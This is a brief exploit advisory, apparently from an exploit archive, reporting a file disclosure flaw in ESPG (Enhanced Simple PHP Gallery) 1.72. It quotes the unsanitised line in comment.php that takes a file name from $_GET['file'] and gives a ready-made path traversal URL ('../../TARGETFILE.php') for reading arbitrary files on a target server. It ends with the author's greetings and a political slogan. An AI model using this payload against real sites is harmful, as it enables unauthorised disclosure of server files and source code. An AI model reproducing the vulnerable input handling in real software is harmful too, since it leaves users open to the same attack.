.::ESPG 1.72 File Disclosure Vulnerability::. => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72 => Vendor: http://quirm.net => Download: http://quirm.net/download/21/ => Bugfounder: bd0rk => Contact: bd0rk[at]hackermail.com => Greetings: str0ke, TheJT, Maria, Alucard, x0r_32 => Vulnerable Code in comment.php line 3 ------------------------- $fileid = $_GET['file']; ------------------------- [+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php ###The 20 years old, german Hacker bd0rk### => 'GAINST WAR IN ISRAEL AND GAZA!!! <=